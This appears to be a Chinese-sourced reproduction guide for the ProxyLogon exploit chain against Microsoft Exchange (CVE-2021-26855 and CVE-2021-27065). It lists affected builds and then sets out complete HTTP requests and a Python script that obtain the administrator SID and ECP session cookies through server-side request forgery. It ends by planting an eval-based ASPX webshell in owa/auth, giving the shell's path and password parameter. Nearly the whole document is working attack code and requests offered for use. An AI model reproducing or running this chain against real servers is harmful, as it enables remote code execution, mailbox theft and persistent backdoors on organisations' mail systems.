ProxyLogon vulnerability (CVE-2021-26855 SSRF chained with CVE-2021-27065 post-auth arbitrary file write)
Affected Exchange versions (any build below the fixed build of its own CU line):
- Exchange Server 2019 CU8 < 15.02.0792.010
- Exchange Server 2019 CU7 < 15.02.0721.013
- Exchange Server 2016 CU18 < 15.01.2106.013
- Exchange Server 2013 CU23 < 15.00.1497.012
Reproducing the vulnerability
Every request below is a POST to a non-existent .js file under /ecp/. The X-BEResource cookie (CVE-2021-26855) tells the front end which backend resource to proxy the request to, and the back end accepts it as an already-authenticated request from the front end.
Obtain the LegacyDN
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=EX01.域名/autodiscover/autodiscover.xml?a=~1942062522;
Content-Type: text/xml
Content-Length: 384
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>administrator@域名</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
Note: the host name in X-BEResource must be the server's own DNS name (FQDN), i.e. the X-FEServer name (the NetBIOS name the front end returns in its X-FEServer response header) with the right DNS suffix. The DNS name can be read from the error path returned for /ecp/15.0.1497.15/.
Obtain the SID
POST /ecp/1qnl.js HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xxx:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
Content-Type: application/mapi-http
X-Requesttype: Connect
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
Content-Length: 149
legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
This body is a raw MS-OXCMAPIHTTP Connect request: the LegacyDN NUL-terminated, then Flags=0, DefaultCodePage=1252 (0x04e4), LcidSort=1033 (0x0409), LcidString=1033 and AuxiliaryBufferSize=0, each a 32-bit little-endian integer. The back end refuses the Connect, and the error message contains the mailbox owner's SID.
Here is a Python script I adapted to fetch the SID:
import sys

import requests
import urllib3

urllib3.disable_warnings()  # the Exchange front end usually has a self-signed certificate

legacyDn = 'your LegacyDN here'
# MS-OXCMAPIHTTP Connect request: UserDn NUL-terminated, then Flags=0, DefaultCodePage=1252,
# LcidSort=1033, LcidString=1033, AuxiliaryBufferSize=0. Built as bytes so that \xe4 is sent
# as a single byte and not UTF-8 encoded into two.
mapi_body = legacyDn.encode() + \
    b"\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
print(mapi_body)
ct = requests.post("https://xx/ecp/iey8.js", headers={
    "Cookie": "X-BEResource=Administrator@xxx:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;",
    "Content-Type": "application/mapi-http",
    "X-Requesttype": "Connect",
    "X-Clientapplication": "Outlook/15.0.4815.1002",
    "X-Requestid": "x"
    },
    data=mapi_body,
    verify=False,
)
# The back end rejects the anonymous Connect, but the error text names the mailbox SID.
if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.text:
    print("Mapi Error!")
    sys.exit(1)
sid = ct.text.split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)
# Swap only the last component (the RID) for 500, the built-in Administrator.
# A plain str.replace() on the RID text would also rewrite any earlier sub-authority
# that happens to contain the same digits.
sid = "-".join(sid.split("-")[:-1] + ["500"])
print("Admin SID: " + sid)
Obtain the ECP session cookies
The response to this request sets ASP.NET_SessionId and msExchEcpCanary; both are needed for the DDI requests that follow.
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/proxyLogon.ecp?a=~1942062522;
Content-Type: text/xml
msExchLogonMailbox: S-1-5-20
Content-Length: 94
<r at="NTLM" ln="Administrator"><s t="0">SID</s></r>
Writing the shell
Use the DDI component's GetList interface to obtain the RawIdentity of the OAB virtual directory (the GetObject interface sometimes returns NULL).
Some of the payloads circulating online are unreliable.
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=2jFfJZZwr0qb5stYgO1ZqrSd81o8P9sIQIZtqw5MbLZr92XtnRmMetsbZnIDjfawrqH-YrzmIzk.&a=~1942062522; ASP.NET_SessionId=a4f36e66-bb79-4a1b-958c-daa459f595c4; msExchEcpCanary=2jFfJZZwr0qb5stYgO1ZqrSd81o8P9sIQIZtqw5MbLZr92XtnRmMetsbZnIDjfawrqH-YrzmIzk.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 251
{"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}}
Note: replace the cookies (ASP.NET_SessionId and msExchEcpCanary, in both the Cookie header and the msExchEcpCanary query parameter) with the ones obtained in the previous step.
Inject the WebShell through the virtual directory's ExternalUrl property
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.&a=~1942062522; ASP.NET_SessionId=7c87c141-4e0e-4c65-b831-b58d397212d9; msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 401
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "cd89bed6-b5cc-4064-b915-5071b89eeafe"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script> "
}
}
}
Again, replace the cookies as above.
Finally, trigger the reset; its backup step writes the virtual directory's configuration, ExternalUrl included, to the UNC path given in FilePathName (CVE-2021-27065).
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.&a=~1942062522;ASP.NET_SessionId=7c87c141-4e0e-4c65-b831-b58d397212d9; msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 378
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "73fff9ed-d8f5-484e-9328-5b76048abdb2"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\afafa.aspx"
}
}
}
At this point the shell is in place.
Shell: https://<host>/owa/auth/afafa.aspx
Parameter (password): code